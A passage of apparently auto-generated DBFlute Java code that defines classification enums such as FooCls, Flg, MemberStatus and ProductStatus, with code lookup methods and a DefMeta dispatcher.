            for (String code : codeList) { clsList.add(of(code).get()); }
            return clsList;
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
         */
        public static List<BarCls> groupOf(String groupName) {
            return new ArrayList<BarCls>(4);
        }
        @Override public String toString() { return code(); }
    }
    /**
     * Classification of Foo <br>
     * (NOTE(review): looks like DBFlute auto-generated CDef code — prefer regenerating over hand-editing; confirm)
     */
    public enum FooCls implements CDef {
        /** FooOne: FooOne */
        FooOne("F01", "FooOne", emptyStrings())
        ,
        /** FooTwo: FooTwo */
        FooTwo("F02", "FooTwo", emptyStrings())
        ,
        /** FooThree: FooThree */
        FooThree("F03", "FooThree", emptyStrings())
        ,
        /** FooFour: FooFour */
        FooFour("F04", "FooFour", emptyStrings())
        ;
        private static final Map<String, FooCls> _codeClsMap = new HashMap<String, FooCls>();
        private static final Map<String, FooCls> _nameClsMap = new HashMap<String, FooCls>();
        // register each element's code, sister codes, and name lower-cased so of()/codeOf()/byName() resolve any casing
        static {
            for (FooCls value : values()) {
                _codeClsMap.put(value.code().toLowerCase(), value);
                for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
                _nameClsMap.put(value.name().toLowerCase(), value);
            }
        }
        private String _code; private String _alias; private Set<String> _sisterSet;
        private FooCls(String code, String alias, String[] sisters)
        { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
        public String code() { return _code; } public String alias() { return _alias; }
        public Set<String> sisterSet() { return _sisterSet; }
        public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
        public ClassificationMeta meta() { return CDef.DefMeta.FooCls; }
        public boolean inGroup(String groupName) {
            return false;
        }
        /**
         * Get the classification of the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
         * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<FooCls> of(Object code) {
            if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
            if (code instanceof FooCls) { return OptionalThing.of((FooCls)code); }
            if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
            return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification code: " + code);
            });
        }
        /**
         * Find the classification by the name. (CaseInsensitive)
         * @param name The string of name, which is case-insensitive. (NotNull)
         * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<FooCls> byName(String name) {
            if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
            return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification name: " + name);
            });
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
         * Get the classification by the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
         */
        public static FooCls codeOf(Object code) {
            if (code == null) { return null; }
            if (code instanceof FooCls) { return (FooCls)code; }
            return _codeClsMap.get(code.toString().toLowerCase());
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
         * Get the classification by the name (also called 'value' in ENUM world).
         * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
         */
        public static FooCls nameOf(String name) {
            if (name == null) { return null; }
            try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
        }
        /**
         * Get the list of all classification elements. (returns new copied list)
         * @return The snapshot list of all classification elements. (NotNull)
         */
        public static List<FooCls> listAll() {
            return new ArrayList<FooCls>(Arrays.asList(values()));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
         */
        public static List<FooCls> listByGroup(String groupName) {
            if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
            throw new ClassificationNotFoundException("Unknown classification group: FooCls." + groupName);
        }
        /**
         * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
         * @param codeList The list of plain code, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
         */
        public static List<FooCls> listOf(Collection<String> codeList) {
            if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
            List<FooCls> clsList = new ArrayList<FooCls>(codeList.size());
            for (String code : codeList) { clsList.add(of(code).get()); }
            return clsList;
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
         */
        public static List<FooCls> groupOf(String groupName) {
            return new ArrayList<FooCls>(4);
        }
        @Override public String toString() { return code(); }
    }
    /**
     * Flag classification (original: フラグを示す — "indicates a flag") <br>
     * (NOTE(review): looks like DBFlute auto-generated CDef code — prefer regenerating over hand-editing; confirm)
     */
    public enum Flg implements CDef {
        /** Yes (はい): indicates the valid state (original: 有効を示す) */
        True("1", "はい", emptyStrings())
        ,
        /** No (いいえ): indicates the invalid state (original: 無効を示す) */
        False("0", "いいえ", emptyStrings())
        ;
        private static final Map<String, Flg> _codeClsMap = new HashMap<String, Flg>();
        private static final Map<String, Flg> _nameClsMap = new HashMap<String, Flg>();
        // register each element's code, sister codes, and name lower-cased so of()/codeOf()/byName() resolve any casing
        static {
            for (Flg value : values()) {
                _codeClsMap.put(value.code().toLowerCase(), value);
                for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
                _nameClsMap.put(value.name().toLowerCase(), value);
            }
        }
        private String _code; private String _alias; private Set<String> _sisterSet;
        private Flg(String code, String alias, String[] sisters)
        { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
        public String code() { return _code; } public String alias() { return _alias; }
        public Set<String> sisterSet() { return _sisterSet; }
        public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
        public ClassificationMeta meta() { return CDef.DefMeta.Flg; }
        public boolean inGroup(String groupName) {
            return false;
        }
        /**
         * Get the classification of the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
         * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<Flg> of(Object code) {
            if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
            if (code instanceof Flg) { return OptionalThing.of((Flg)code); }
            if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
            return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification code: " + code);
            });
        }
        /**
         * Find the classification by the name. (CaseInsensitive)
         * @param name The string of name, which is case-insensitive. (NotNull)
         * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
         */
        public static OptionalThing<Flg> byName(String name) {
            if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
            return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
                throw new ClassificationNotFoundException("Unknown classification name: " + name);
            });
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
         * Get the classification by the code. (CaseInsensitive)
         * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
         */
        public static Flg codeOf(Object code) {
            if (code == null) { return null; }
            if (code instanceof Flg) { return (Flg)code; }
            return _codeClsMap.get(code.toString().toLowerCase());
        }
        /**
         * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
         * Get the classification by the name (also called 'value' in ENUM world).
         * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
         * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
         */
        public static Flg nameOf(String name) {
            if (name == null) { return null; }
            try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
        }
        /**
         * Get the list of all classification elements. (returns new copied list)
         * @return The snapshot list of all classification elements. (NotNull)
         */
        public static List<Flg> listAll() {
            return new ArrayList<Flg>(Arrays.asList(values()));
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
         */
        public static List<Flg> listByGroup(String groupName) {
            if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
            throw new ClassificationNotFoundException("Unknown classification group: Flg." + groupName);
        }
        /**
         * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
         * @param codeList The list of plain code, which is case-insensitive. (NotNull)
         * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
         */
        public static List<Flg> listOf(Collection<String> codeList) {
            if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
            List<Flg> clsList = new ArrayList<Flg>(codeList.size());
            for (String code : codeList) { clsList.add(of(code).get()); }
            return clsList;
        }
        /**
         * Get the list of classification elements in the specified group. (returns new copied list) <br>
         * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
         * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
         */
        public static List<Flg> groupOf(String groupName) {
            return new ArrayList<Flg>(4);
        }
        @Override public String toString() { return code(); }
    }
/**
* 会員ステータス: 会員の状態を示す
*/
public enum MemberStatus implements CDef {
/** 正式会員: 正式な会員を示す */
Formalized("FML", "正式会員", emptyStrings())
,
/** 仮会員: 仮の会員を示す */
Provisional("PRV", "仮会員", emptyStrings())
,
/** 退会会員: 退会した会員を示す */
Withdrawal("WDL", "退会会員", emptyStrings())
;
private static final Map<String, MemberStatus> _codeClsMap = new HashMap<String, MemberStatus>();
private static final Map<String, MemberStatus> _nameClsMap = new HashMap<String, MemberStatus>();
static {
for (MemberStatus value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private MemberStatus(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.MemberStatus; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<MemberStatus> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof MemberStatus) { return OptionalThing.of((MemberStatus)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<MemberStatus> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static MemberStatus codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof MemberStatus) { return (MemberStatus)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static MemberStatus nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<MemberStatus> listAll() {
return new ArrayList<MemberStatus>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<MemberStatus> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: MemberStatus." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<MemberStatus> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<MemberStatus> clsList = new ArrayList<MemberStatus>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<MemberStatus> groupOf(String groupName) {
return new ArrayList<MemberStatus>(4);
}
        /** {@inheritDoc} (returns the plain code value) */
        @Override public String toString() { return code(); }
}
/**
* 商品ステータス: 商品の状態を示す
*/
public enum ProductStatus implements CDef {
/** 生産販売可能 */
OnSale("ONS", "生産販売可能", emptyStrings())
,
/** 生産中止 */
ProductStop("PST", "生産中止", emptyStrings())
,
/** 販売中止 */
SaleStop("SST", "販売中止", emptyStrings())
;
private static final Map<String, ProductStatus> _codeClsMap = new HashMap<String, ProductStatus>();
private static final Map<String, ProductStatus> _nameClsMap = new HashMap<String, ProductStatus>();
static {
for (ProductStatus value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private ProductStatus(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.ProductStatus; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<ProductStatus> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof ProductStatus) { return OptionalThing.of((ProductStatus)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<ProductStatus> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static ProductStatus codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof ProductStatus) { return (ProductStatus)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static ProductStatus nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<ProductStatus> listAll() {
return new ArrayList<ProductStatus>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<ProductStatus> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: ProductStatus." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<ProductStatus> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<ProductStatus> clsList = new ArrayList<ProductStatus>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<ProductStatus> groupOf(String groupName) {
return new ArrayList<ProductStatus>(4);
}
@Override public String toString() { return code(); }
}
public enum DefMeta implements ClassificationMeta {
/** 会員が受けられるサービスのランクを示す */
ServiceRank
,
/** mainly region of member address */
Region
,
/** reason for member withdrawal */
WithdrawalReason
,
/** 支払方法 */
PaymentMethod
,
/** the test of reference variable in grouping map */
GroupingReference
,
/** The test of relation reference */
SelfReference
,
/** The test of top only */
TopCommentOnly
,
/** the test of sub-item map for implicit classification */
SubItemImplicit
,
/** the test of sub-item map for table classification */
SubItemTable
,
/** boolean classification for boolean column */
BooleanFlg
,
/** master type of variant relation (biz-many-to-one) */
VariantRelationMasterType
,
/** qux type of variant relation (biz-many-to-one) */
VariantRelationQuxType
,
/** merged */
QuxCls
,
/** delimiter; & endBrace} & path\foo\bar */
EscapedDfpropCls
,
/** /*IF pmb.yourTop*/><& */
EscapedJavaDocCls
,
/** 6 */
EscapedNumberInitialCls
,
/** top first line top second line top third line */
LineSepCommentCls
,
/** no camelizing classification */
NamingDefaultCamelizingType
,
/** no camelizing classification */
NamingNoCamelizingType
,
/** is deprecated classification */
DeprecatedTopBasicType
,
/** has deprecated element */
DeprecatedMapBasicType
,
/** has deprecated element */
DeprecatedMapCollaborationType
,
/** unique key as classification */
UQClassificationType
,
/** Classification of Bar */
BarCls
,
/** Classification of Foo */
FooCls
,
/** フラグを示す */
Flg
,
/** 会員ステータス: 会員の状態を示す */
MemberStatus
,
/** 商品ステータス: 商品の状態を示す */
ProductStatus
;
        /**
         * Provide the classification name of this definition.
         * @return The same value as the enum constant name. (NotNull)
         */
        public String classificationName() {
            return name(); // same as definition name
        }
public OptionalThing<? extends Classification> of(Object code) {
if (ServiceRank.name().equals(name())) { return CDef.ServiceRank.of(code); }
if (Region.name().equals(name())) { return CDef.Region.of(code); }
if (WithdrawalReason.name().equals(name())) { return CDef.WithdrawalReason.of(code); }
if (PaymentMethod.name().equals(name())) { return CDef.PaymentMethod.of(code); }
if (GroupingReference.name().equals(name())) { return CDef.GroupingReference.of(code); }
if (SelfReference.name().equals(name())) { return CDef.SelfReference.of(code); }
if (TopCommentOnly.name().equals(name())) { return CDef.TopCommentOnly.of(code); }
if (SubItemImplicit.name().equals(name())) { return CDef.SubItemImplicit.of(code); }
if (SubItemTable.name().equals(name())) { return CDef.SubItemTable.of(code); }
if (BooleanFlg.name().equals(name())) { return CDef.BooleanFlg.of(code); }
if (VariantRelationMasterType.name().equals(name())) { return CDef.VariantRelationMasterType.of(code); }
if (VariantRelationQuxType.name().equals(name())) { return CDef.VariantRelationQuxType.of(code); }
if (QuxCls.name().equals(name())) { return CDef.QuxCls.of(code); }
if (EscapedDfpropCls.name().equals(name())) { return CDef.EscapedDfpropCls.of(code); }
if (EscapedJavaDocCls.name().equals(name())) { return CDef.EscapedJavaDocCls.of(code); }
if (EscapedNumberInitialCls.name().equals(name())) { return CDef.EscapedNumberInitialCls.of(code); }
if (LineSepCommentCls.name().equals(name())) { return CDef.LineSepCommentCls.of(code); }
if (NamingDefaultCamelizingType.name().equals(name())) { return CDef.NamingDefaultCamelizingType.of(code); }
if (NamingNoCamelizingType.name().equals(name())) { return CDef.NamingNoCamelizingType.of(code); }
if (DeprecatedTopBasicType.name().equals(name())) { return CDef.DeprecatedTopBasicType.of(code); }
if (DeprecatedMapBasicType.name().equals(name())) { return CDef.DeprecatedMapBasicType.of(code); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return CDef.DeprecatedMapCollaborationType.of(code); }
if (UQClassificationType.name().equals(name())) { return CDef.UQClassificationType.of(code); }
if (BarCls.name().equals(name())) { return CDef.BarCls.of(code); }
if (FooCls.name().equals(name())) { return CDef.FooCls.of(code); }
if (Flg.name().equals(name())) { return CDef.Flg.of(code); }
if (MemberStatus.name().equals(name())) { return CDef.MemberStatus.of(code); }
if (ProductStatus.name().equals(name())) { return CDef.ProductStatus.of(code); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public OptionalThing<? extends Classification> byName(String name) {
if (ServiceRank.name().equals(name())) { return CDef.ServiceRank.byName(name); }
if (Region.name().equals(name())) { return CDef.Region.byName(name); }
if (WithdrawalReason.name().equals(name())) { return CDef.WithdrawalReason.byName(name); }
if (PaymentMethod.name().equals(name())) { return CDef.PaymentMethod.byName(name); }
if (GroupingReference.name().equals(name())) { return CDef.GroupingReference.byName(name); }
if (SelfReference.name().equals(name())) { return CDef.SelfReference.byName(name); }
if (TopCommentOnly.name().equals(name())) { return CDef.TopCommentOnly.byName(name); }
if (SubItemImplicit.name().equals(name())) { return CDef.SubItemImplicit.byName(name); }
if (SubItemTable.name().equals(name())) { return CDef.SubItemTable.byName(name); }
if (BooleanFlg.name().equals(name())) { return CDef.BooleanFlg.byName(name); }
if (VariantRelationMasterType.name().equals(name())) { return CDef.VariantRelationMasterType.byName(name); }
if (VariantRelationQuxType.name().equals(name())) { return CDef.VariantRelationQuxType.byName(name); }
if (QuxCls.name().equals(name())) { return CDef.QuxCls.byName(name); }
if (EscapedDfpropCls.name().equals(name())) { return CDef.EscapedDfpropCls.byName(name); }
if (EscapedJavaDocCls.name().equals(name())) { return CDef.EscapedJavaDocCls.byName(name); }
if (EscapedNumberInitialCls.name().equals(name())) { return CDef.EscapedNumberInitialCls.byName(name); }
if (LineSepCommentCls.name().equals(name())) { return CDef.LineSepCommentCls.byName(name); }
if (NamingDefaultCamelizingType.name().equals(name())) { return CDef.NamingDefaultCamelizingType.byName(name); }
if (NamingNoCamelizingType.name().equals(name())) { return CDef.NamingNoCamelizingType.byName(name); }
if (DeprecatedTopBasicType.name().equals(name())) { return CDef.DeprecatedTopBasicType.byName(name); }
if (DeprecatedMapBasicType.name().equals(name())) { return CDef.DeprecatedMapBasicType.byName(name); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return CDef.DeprecatedMapCollaborationType.byName(name); }
if (UQClassificationType.name().equals(name())) { return CDef.UQClassificationType.byName(name); }
if (BarCls.name().equals(name())) { return CDef.BarCls.byName(name); }
if (FooCls.name().equals(name())) { return CDef.FooCls.byName(name); }
if (Flg.name().equals(name())) { return CDef.Flg.byName(name); }
if (MemberStatus.name().equals(name())) { return CDef.MemberStatus.byName(name); }
if (ProductStatus.name().equals(name())) { return CDef.ProductStatus.byName(name); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public Classification codeOf(Object code) { // null if not found, old style so use of(code)
if (ServiceRank.name().equals(name())) { return CDef.ServiceRank.codeOf(code); }
if (Region.name().equals(name())) { return CDef.Region.codeOf(code); }
if (WithdrawalReason.name().equals(name())) { return CDef.WithdrawalReason.codeOf(code); }
if (PaymentMethod.name().equals(name())) { return CDef.PaymentMethod.codeOf(code); }
if (GroupingReference.name().equals(name())) { return CDef.GroupingReference.codeOf(code); }
if (SelfReference.name().equals(name())) { return CDef.SelfReference.codeOf(code); }
if (TopCommentOnly.name().equals(name())) { return CDef.TopCommentOnly.codeOf(code); }
if (SubItemImplicit.name().equals(name())) { return CDef.SubItemImplicit.codeOf(code); }
if (SubItemTable.name().equals(name())) { return CDef.SubItemTable.codeOf(code); }
if (BooleanFlg.name().equals(name())) { return CDef.BooleanFlg.codeOf(code); }
if (VariantRelationMasterType.name().equals(name())) { return CDef.VariantRelationMasterType.codeOf(code); }
if (VariantRelationQuxType.name().equals(name())) { return CDef.VariantRelationQuxType.codeOf(code); }
if (QuxCls.name().equals(name())) { return CDef.QuxCls.codeOf(code); }
if (EscapedDfpropCls.name().equals(name())) { return CDef.EscapedDfpropCls.codeOf(code); }
if (EscapedJavaDocCls.name().equals(name())) { return CDef.EscapedJavaDocCls.codeOf(code); }
if (EscapedNumberInitialCls.name().equals(name())) { return CDef.EscapedNumberInitialCls.codeOf(code); }
if (LineSepCommentCls.name().equals(name())) { return CDef.LineSepCommentCls.codeOf(code); }
if (NamingDefaultCamelizingType.name().equals(name())) { return CDef.NamingDefaultCamelizingType.codeOf(code); }
if (NamingNoCamelizingType.name().equals(name())) { return CDef.NamingNoCamelizingType.codeOf(code); }
if (DeprecatedTopBasicType.name().equals(name())) { return CDef.DeprecatedTopBasicType.codeOf(code); }
if (DeprecatedMapBasicType.name().equals(name())) { return CDef.DeprecatedMapBasicType.codeOf(code); }
if (DeprecatedMapCollaborationType.name().equals(name())) { return CDef.DeprecatedMapCollaborationType.codeOf(code); }
if (UQClassificationType.name().equals(name())) { return CDef.UQClassificationType.codeOf(code); }
if (BarCls.name().equals(name())) { return CDef.BarCls.codeOf(code); }
if (FooCls.name().equals(name())) { return CDef.FooCls.codeOf(code); }
if (Flg.name().equals(name())) { return CDef.Flg.codeOf(code); }
if (MemberStatus.name().equals(name())) { return CDef.MemberStatus.codeOf(code); }
if (ProductStatus.name().equals(name())) { return CDef.ProductStatus.codeOf(code); }
throw new IllegalStateException("Unknown definition: " + this); // basically unreachable
}
public Classification nameOf(String name) { // null if not found, old style so use byName(name)
if (ServiceRank.name().equals(name())) { return CDef.ServiceRank.valueOf(name); }
if (Region.name().equals(name())) { return CDef.Region.valueOf(name); }
if (WithdrawalReason.name().equals(name())) { return CDef.WithdrawalReason.valueOf(name); }
if (PaymentMethod.name().equals(name())) { return CDef.PaymentMethod.valueOf(name); }
if (GroupingReference.name().equals(name())) { return CDef.GroupingReference.valueOf(name); }
if (SelfReference.name().equals(name())) { return CDef.SelfReference.valueOf(name); }
if (TopCommentOnly.name().equals(name())) { return CDef.TopCommentOnly.valueOf(name); }
if (SubItemImplicit.name().equals(name())) { return CDef.SubItemImplicit.valueOf(name); }
if (SubItemTable.name().equals(name())) { return CDef.SubItemTable.valueOf(name); }
if (BooleanFlg.name().equals(name())) { return CDef.BooleanFlg.valueOf(name); }
if (VariantRelationMasterType.name().equals(name())) { return CDef.VariantRelationMasterType.valueOf(name); }
if (VariantRelationQuxType.name().equals(name())) { return CDef.VariantRelationQuxType.valueOf(name); }
if (QuxCls.name().equals(name())) { return CDef.QuxCls.valueOf(name); }
if (EscapedDfpropCls.name().equals(name())) { return CDef.EscapedDfpropCls.valueOf(name); }
if (EscapedJavaDocCls.name().equals(name())) { return CDef.EscapedJavaDocCls.valueOf(name); }
if (EscapedNumberInitialCls.name().equals(name())) { return CDef.EscapedNumberInitialCls.valueOf(name); }
if (LineSepCommentCls.name().equals(name())) { return CDef.LineSepCommentCls.valueOf(name); }
if (NamingDefaultCamelizingType.name().equals(name())) { return CDef.NamingDefaultCamelizingType.valueOf(name); }
if (NamingNoCamelizingType.name().equals(name())) { return CDef.NamingNoCamelizingType.valueOf(name); }
if (DeprecatedTopBasicType.name().equals(name())) { return CDef.DeprecatedTopBasicType.valueOf(name); }
